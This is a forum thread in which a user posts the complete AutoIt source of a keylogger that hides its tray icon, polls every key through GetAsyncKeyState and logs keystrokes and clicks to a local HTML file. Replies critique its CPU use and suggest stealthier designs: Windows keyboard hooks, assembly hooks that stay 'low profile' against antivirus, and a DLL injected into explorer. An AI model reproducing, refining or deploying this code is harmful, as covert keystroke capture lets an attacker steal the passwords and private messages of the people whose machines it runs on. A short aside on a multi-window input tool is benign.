• Coding
  • Application - Portable Keylogger

I searched over the internet and could not find a free portable keylogger.
So I created a portable keylogger with autoit which will run invisibly (it shows up only at the process list).
When you run the keylogger, it will store the keys in "code.html" file on the same folder.
Sometimes it doesn't store all the keys (I don't know why) but it is still better than nothing.
Check it if you want; here is the link.
I just tried it. It's easily detectable (through the Task Manager) and through processing power it requires, which made my CPU go crazy (13% of a core i7 CPU is too much i guess).


Nevertheless, i like it. good work. And i'd like to take a look at the source code if you don't mind.

I still prefer these cute little hardware keyloggers... Silent and Deadly.
Here it is
#NoTrayIcon
Global Const $VK_CAPITAL = 0x14
While 1
   If _IsPressed('41') = 1 Then 
	   If _IsPressed('10') = cps() Then
			wr("a")
			Else
			wr("A")
	   Endif
	   EndIf
	   While _IsPressed('41') = 1
	   WEnd
   If _IsPressed('42') = 1 Then 
	   If _IsPressed('10') = cps() Then
	   wr("b")
	   			Else
			wr("B")
	   Endif
	   EndIf
	   While _IsPressed('42') = 1
	   WEnd
   If _IsPressed('43') = 1 Then 
	   If _IsPressed('10') = cps() Then
	   wr("c")
	   			Else
			wr("C")
	   Endif
	   EndIf
	   While _IsPressed('43') = 1
	   WEnd
   If _IsPressed('44') = 1 Then
	   If _IsPressed('10') = cps() Then
	   wr("d")
	   			Else
			wr("D")
	   Endif
	   EndIf
	   While _IsPressed('44') = 1
	   WEnd
   If _IsPressed('45') = 1 Then
	   If _IsPressed('10') = cps() Then
	   wr("e")
	   			Else
			wr("E")
	   Endif
	   EndIf
	   While _IsPressed('45') = 1
	   WEnd
   If _IsPressed('46') = 1 Then
	   If _IsPressed('10') = cps() Then
	   wr("f")
	   			Else
			wr("F")
	   Endif
	   EndIf
	   While _IsPressed('46') = 1
	   WEnd
   If _IsPressed('47') = 1 Then
	   If _IsPressed('10') = cps() Then
	   wr("g")
	   			Else
			wr("G")
	   Endif
	   EndIf
	   While _IsPressed('47') = 1
	   WEnd
   If _IsPressed('48') = 1 Then 
	   If _IsPressed('10') = cps() Then
	   wr("h")
	   			Else
			wr("H")
	   Endif
	   EndIf
	   While _IsPressed('48') = 1
	   WEnd
   If _IsPressed('49') = 1 Then
	   If _IsPressed('10') = cps() Then
	   wr("i")
	   			Else
			wr("I")
	   Endif
	   EndIf
	   While _IsPressed('49') = 1
	   WEnd
   If _IsPressed('4a') = 1 Then 
	   If _IsPressed('10') = cps() Then
	   wr("j")
	   			Else
			wr("J")
	   Endif
	   EndIf
	   While _IsPressed('4a') = 1
	   WEnd
   If _IsPressed('4b') = 1 Then 
	   If _IsPressed('10') = cps() Then
	   wr("k")
	   			Else
			wr("K")
	   Endif
	   EndIf
	   While _IsPressed('4b') = 1
	   WEnd
   If _IsPressed('4c') = 1 Then 
	   If _IsPressed('10') = cps() Then
	wr("l")
				Else
			wr("L")
	   Endif
	   EndIf
	   While _IsPressed('4c') = 1
	   WEnd
   If _IsPressed('4d') = 1 Then
	   If _IsPressed('10') = cps() Then
	   wr("m")
	   			Else
			wr("M")
	   Endif
	   EndIf
	   While _IsPressed('4d') = 1
	   WEnd
   If _IsPressed('4e') = 1 Then
	   If _IsPressed('10') = cps() Then
	   wr("n")
	   			Else
			wr("N")
	   Endif
	   EndIf
	   While _IsPressed('4e') = 1
	   WEnd
   If _IsPressed('4f') = 1 Then 
	   If _IsPressed('10') = cps() Then
	   wr("o")
	   			Else
			wr("O")
	   Endif
	   EndIf
	   While _IsPressed('4f') = 1
	   WEnd
   If _IsPressed('50') = 1 Then
	   If _IsPressed('10') = cps() Then
	   wr("p")
	   			Else
			wr("P")
	   Endif
	   EndIf
	   While _IsPressed('50') = 1
	   WEnd
   If _IsPressed('51') = 1 Then
	   If _IsPressed('10') = cps() Then
	   wr("q")
	   			Else
			wr("Q")
	   Endif
	   EndIf
	   While _IsPressed('51') = 1
	   WEnd
   If _IsPressed('52') = 1 Then
	   If _IsPressed('10') = cps() Then
	   wr("r")			
	   Else
			wr("R")
	   Endif
	   EndIf
	   While _IsPressed('52') = 1
	   WEnd
   If _IsPressed('53') = 1 Then
	   If _IsPressed('10') = cps() Then
	   wr("s")
	   			Else
			wr("S")
	   Endif
	   EndIf
	   While _IsPressed('53') = 1
	   WEnd
   If _IsPressed('54') = 1 Then
	   If _IsPressed('10') = cps() Then
	   wr("t")
	   			Else
			wr("T")
	   Endif
	   EndIf
	   While _IsPressed('54') = 1
	   WEnd
   If _IsPressed('55') = 1 Then
	   If _IsPressed('10') = cps() Then
	   wr("u")
	   			Else
			wr("U")
	   Endif
	   EndIf
	   While _IsPressed('55') = 1
	   WEnd
   If _IsPressed('56') = 1 Then
	   If _IsPressed('10') = cps() Then
	   wr("v")
	   			Else
			wr("V")
	   Endif
	   EndIf
	   While _IsPressed('56') = 1
	   WEnd
   If _IsPressed('57') = 1 Then
	   If _IsPressed('10') = cps() Then
	   wr("w")
	   			Else
			wr("W")
	   Endif
	   EndIf
	   While _IsPressed('57') = 1
	   WEnd
   If _IsPressed('58') = 1 Then
	   If _IsPressed('10') = cps() Then
	   wr("x")
	   			Else
			wr("X")
	   Endif
	   EndIf
	   While _IsPressed('58') = 1
	   WEnd
   If _IsPressed('59') = 1 Then
	   If _IsPressed('10') = cps() Then
	   wr("y")
	   			Else
			wr("Y")
	   Endif
	   EndIf
	   While _IsPressed('59') = 1
	   WEnd
   If _IsPressed('5a') = 1 Then
	   If _IsPressed('10') = cps() Then
	   wr("z")
	   			Else
			wr("Z")
	   Endif
	   EndIf
	   While _IsPressed('5a') = 1
	   WEnd
	   
	   ;===============================================================
	   ;numbers
	   	   If _IsPressed('60') = 1 Then wr("0")
	   While _IsPressed('60') = 1
	   WEnd
	   	   	   If _IsPressed('61') = 1 Then wr("1")
	   While _IsPressed('61') = 1
	   WEnd
	   	   If _IsPressed('62') = 1 Then wr("2")
	   While _IsPressed('62') = 1
	   WEnd
	   	   If _IsPressed('63') = 1 Then wr("3")
	   While _IsPressed('63') = 1
	   WEnd
	   	   If _IsPressed('64') = 1 Then wr("4")
	   While _IsPressed('64') = 1
	   WEnd
	   	   If _IsPressed('65') = 1 Then wr("5")
	   While _IsPressed('65') = 1
	   WEnd
	   	   If _IsPressed('66') = 1 Then wr("6")
	   While _IsPressed('66') = 1
	   WEnd
	   	   If _IsPressed('67') = 1 Then wr("7")
	   While _IsPressed('67') = 1
	   WEnd
	   	   If _IsPressed('68') = 1 Then wr("8")
	   While _IsPressed('68') = 1
	   WEnd
	   	   If _IsPressed('69') = 1 Then wr("9")
	   While _IsPressed('69') = 1
	   WEnd
	   	   If _IsPressed('6A') = 1 Then wr("*")
	   While _IsPressed('6A') = 1
	   WEnd
	   	   	   If _IsPressed('6B') = 1 Then wr("+")
	   While _IsPressed('6B') = 1
	   WEnd
	   	   	   If _IsPressed('6D') = 1 Then wr("-")
	   While _IsPressed('6D') = 1
	   WEnd
	   	   	   If _IsPressed('6E') = 1 Then wr(".")
	   While _IsPressed('6E') = 1
	   WEnd
	   	   	   If _IsPressed('6F') = 1 Then wr("/")
	   While _IsPressed('6F') = 1
	   WEnd
	   
	   If _IsPressed('30') = 1 Then
	   If _IsPressed('10') = 1 Then
	   wr(")")
	   			Else
			wr("0")
	   Endif
	   EndIf
	   While _IsPressed('30') = 1
	   WEnd
   If _IsPressed('31') = 1 Then
	   If _IsPressed('10') = 1 Then
	   wr("!")
	   			Else
			wr("1")
	   Endif
	   EndIf
	   While _IsPressed('31') = 1
	   WEnd
   If _IsPressed('32') = 1 Then
	   If _IsPressed('10') = 1 Then
	   wr("@")			
	   Else
			wr("2")
	   Endif
	   EndIf
	   While _IsPressed('32') = 1
	   WEnd
   If _IsPressed('33') = 1 Then
	   If _IsPressed('10') = 1 Then
	   wr("#")
	   			Else
			wr("3")
	   Endif
	   EndIf
	   While _IsPressed('33') = 1
	   WEnd
   If _IsPressed('34') = 1 Then
	   If _IsPressed('10') = 1 Then
	   wr("$")
	   			Else
			wr("4")
	   Endif
	   EndIf
	   While _IsPressed('34') = 1
	   WEnd
   If _IsPressed('35') = 1 Then
	   If _IsPressed('10') = cps() Then
	   wr("%")
	   			Else
			wr("5")
	   Endif
	   EndIf
	   While _IsPressed('35') = 1
	   WEnd
   If _IsPressed('36') = 1 Then
	   If _IsPressed('10') = 1 Then
	   wr("^")
	   			Else
			wr("6")
	   Endif
	   EndIf
	   While _IsPressed('36') = 1
	   WEnd
   If _IsPressed('37') = 1 Then
	   If _IsPressed('10') = 1 Then
	   wr("&")
	   			Else
			wr("7")
	   Endif
	   EndIf
	   While _IsPressed('37') = 1
	   WEnd
   If _IsPressed('38') = 1 Then
	   If _IsPressed('10') = 1 Then
	   wr("*")
	   			Else
			wr("8")
	   Endif
	   EndIf
	   While _IsPressed('38') = 1
	   WEnd
   If _IsPressed('39') = 1 Then
	   If _IsPressed('10') = 1 Then
	   wr("(")
	   			Else
			wr("9")
	   Endif
	   EndIf
	   While _IsPressed('39') = 1
	   WEnd
	   ;===============================================================
	   ;other keys
	   If _IsPressed('20') = 1 Then wr(" ")
	   While _IsPressed('20') = 1
	   WEnd
	   
	      If _IsPressed('BA') = 1 Then
	   If _IsPressed('10') = 1 Then
	   wr(":")
	   			Else
			wr(";")
	   Endif
	   EndIf
	   While _IsPressed('BA') = 1
	   WEnd
	      If _IsPressed('BB') = 1 Then
	   If _IsPressed('10') = 1 Then
	   wr("+")
	   			Else
			wr("=")
	   Endif
	   EndIf
	   While _IsPressed('BB') = 1
	   WEnd
	      If _IsPressed('BC') = 1 Then
	   If _IsPressed('10') = 1 Then
	   wr("<")
	   			Else
			wr(",")
	   Endif
	   EndIf
	   While _IsPressed('BC') = 1
	   WEnd
	      If _IsPressed('BD') = 1 Then
	   If _IsPressed('10') = 1 Then
	   wr("_")
	   			Else
			wr("-")
	   Endif
	   EndIf
	   While _IsPressed('BD') = 1
	   WEnd
	      If _IsPressed('BE') = 1 Then
	   If _IsPressed('10') = 1 Then
	   wr(">")
	   			Else
			wr(".")
	   Endif
	   EndIf
	   While _IsPressed('BE') = 1
	   WEnd
	      If _IsPressed('BF') = 1 Then
	   If _IsPressed('10') = 1 Then
	   wr("?")
	   			Else
			wr("/")
	   Endif
	   EndIf
	   While _IsPressed('BF') = 1
	   WEnd
	      If _IsPressed('C0') = 1 Then
	   If _IsPressed('10') = 1 Then
	   wr("~")
	   			Else
			wr("`")
	   Endif
	   EndIf
	   While _IsPressed('BF') = 1
	   WEnd
	      If _IsPressed('DB') = 1 Then
	   If _IsPressed('10') = 1 Then
	   wr("{")
	   			Else
			wr("[")
	   Endif
	   EndIf
	   While _IsPressed('DB') = 1
	   WEnd
	      If _IsPressed('DC') = 1 Then
	   If _IsPressed('10') = 1 Then
	   wr("|")
	   			Else
			wr("\")
	   Endif
	   EndIf
	   While _IsPressed('DC') = 1
	   WEnd
	      If _IsPressed('DD') = 1 Then
	   If _IsPressed('10') = 1 Then
	   wr("}")
	   			Else
			wr("]")
	   Endif
	   EndIf
	   While _IsPressed('DD') = 1
	   WEnd
	      If _IsPressed('DE') = 1 Then
	   If _IsPressed('10') = 1 Then
	   wr('"')
	   			Else
			wr("'")
	   Endif
	   EndIf
	   While _IsPressed('38') = 1
	   WEnd
	   ;============================================
	   ;special characters
	   	   If _IsPressed('01') = 1 Then
			   $file=FileOpen("code.html",0)
			   $content=FileRead($file)
			   FileClose($file)
			   $click_pos = StringInStr($content,"<b style='color:red'>[USER-CLICKED]</b>",0,-1)
			   $end_pos = StringInStr($content,StringRight($content,1),0,-1)
			   ;MsgBox(1,"a","size: "&$end_pos&"  pos: "&$click_pos)
			   If $end_pos - $click_pos=43 Then
				   Else
			   wr("<br/>")
			   wr("<b style='color:red'>[USER-CLICKED]</b>")
			   wr("<br/>")
			   EndIf
			   Endif
	   While _IsPressed('01') = 1
	   WEnd
	   If _IsPressed('08') = 1 Then wr("<b style='color:red'>[BACKSPACE]</b>")
	   While _IsPressed('08') = 1
	   WEnd
		If _IsPressed('09') = 1 Then wr("<b style='color:red'>[TAB-KEY]</b>")
	   While _IsPressed('09') = 1
	   WEnd
	   		If _IsPressed('0D') = 1 Then wr("<br/>")
	   While _IsPressed('0D') = 1
	   WEnd
	   	   		If _IsPressed('25') = 1 Then wr("<b style='color:red'>[LEFT-ARROW]</b>")
	   While _IsPressed('25') = 1
	   WEnd
	   	   		If _IsPressed('26') = 1 Then wr("<b style='color:red'>[UP-ARROW]</b>")
	   While _IsPressed('26') = 1
	   WEnd
	   	   		If _IsPressed('27') = 1 Then wr("<b style='color:red'>[RIGHT-ARROW]</b>")
	   While _IsPressed('27') = 1
	   WEnd
	   	   		If _IsPressed('28') = 1 Then wr("<b style='color:red'>[DOWN-ARROW]</b>")
	   While _IsPressed('28') = 1
	   WEnd
	   	   		If _IsPressed('23') = 1 Then wr("<b style='color:red'>[END-KEY]</b>")
	   While _IsPressed('23') = 1
	   WEnd
	   	   		If _IsPressed('24') = 1 Then wr("<b style='color:red'>[HOME-KEY]</b>")
	   While _IsPressed('24') = 1
	   WEnd
	   	   	   		If _IsPressed('2E') = 1 Then wr("<b style='color:red'>[DEL-KEY]</b>")
	   While _IsPressed('2E') = 1
	   WEnd
Wend
Func wr($key)
	FileWrite ("code.html",$key)
	EndFunc
Exit
Func _IsPressed($hexKey)
   
   Local $aR, $bO
   
   $hexKey = '0x' & $hexKey
   $aR = DllCall("user32", "int", "GetAsyncKeyState", "int", $hexKey)
   If Not @error And BitAND($aR[0], 0x8000) = 0x8000 Then
      $bO = 1
   Else
      $bO = 0
   EndIf
   
   Return $bO
EndFunc  ;==>_IsPressed
Func cps()
    Local $ret
    $ret = DllCall("user32.dll","long","GetKeyState","long",$VK_CAPITAL)
    Return $ret[0]
EndFunc
Nice project but as Georges said it consumes alot of CPU usage, I have an AMD turion CPU and it consumes around 50% prettt bad.

To have that much CPU usage, most probably your application is continuously polling the state of the keyboard in some loop that keeps on forever thats bad. For better performance you will have to let your program to listen to the keyboard events broadcast by the OS, when it is set to listen to an event the program would no more consume all that cpu time and the process will stay sleeping till an event occurs.

Good luck and keep up the good work :)

Edit: Checked your code, all those nested ifs and while loops inside your main while loop really tire up the cpu, thats pretty bad code. Try to research how you can intercept keyboard events in your app rather than polling the state of each key all the time, this thing should be possible in a language like C/C++.
the good
keyloggers have good functions, just last week i was working in a large environment.
i had to type here and there with different applications to a point that i forgot what
configurations i had set in different places, a keylogger would have helped in backtracing.

the bad
as we all know, keyloggers can be abused.

the ugly
for legal auditing usage, it may not be resources, it must be visible, it must add time stamp entries, etc..

i remember when about 13y ago i was attempting to write a keylogger with vb, it was a nightmare, i gave up.
That is an inefficient method of fetching keys; As you can see, it is very demanding on the CPU.
The best method to use is hooks, research it. You'll find a lot of working examples in AutoIT (_WinAPI_SetWindowsHookEx).
As Ayman mentioned, your code can be further improved. The performance is a must.
Give C/C++ a try.
cpu consuming is a common problem for all keyloggers even if it's written in c/c++ because of its infinite loop.
a simple solution for this problem is to avoid processing every key stroke into ascii. just leave it coded and later when you recover your dump file you can process it to ascii with the help of another software. so you will have to write 2 different *.exe and divide the task among them.
but the best solution is to hook the keyboard using assembly. Windows will activate your code whenever any key is pressed. but with this technique you come face to face with the anti virus so you need to be low profile and creative.
5 days later
talking about keylogging and repurposing.

does anyone know of a good tool or how easy it would be to create a unix multiterm equivalent?

unix multiterm is an application where as you can select a number of windows/shells from your desktop session and provides you with an input field. the aim is to have your input distributed to the selected windows. for example you would have multiple putty, notepad, web browser etc. you just write to the multiterm input field and the strings and control keys are automatically distributed and entered to the selected applications.

and yes, i am talking about having one run on windows system! .net is not an issue, it is quiet common nowadays.
BashLogic wrotedoes anyone know of a good tool or how easy it would be to create a unix multiterm equivalent?
I do not know of any. Building an equivalent is not relatively hard, nor is it straightforward. If you're going for .NET, here's what you need:

1.0- Calls are made using P/Invoke (user32.dll)
2.0- You would use EnumWindowsProc to get a list of all windows
2.1- - This is the part where its not quite straightforward, simply because this function would return all windows, children or not, titled or not, so you'll see alot of junk. You will need to filter the result.
3.0- You would use SendMessage or PostMessage to dispatch the key to the window handle that you acquired in the previous call.

It's a nice exercise for anyone willing.

P.S.: I cannot vouch on whether this is portable across windows versions.
i remember when about 13y ago i was attempting to write a keylogger with vb, it was a nightmare, i gave up
Lol, had the same problem .... but around 10yrs ago.

anyway, there are really a lot of ways to create stealthy key loggers.
the most simple one would be to create a dll that will hook the API calls and inject it into an existing process (like explorer).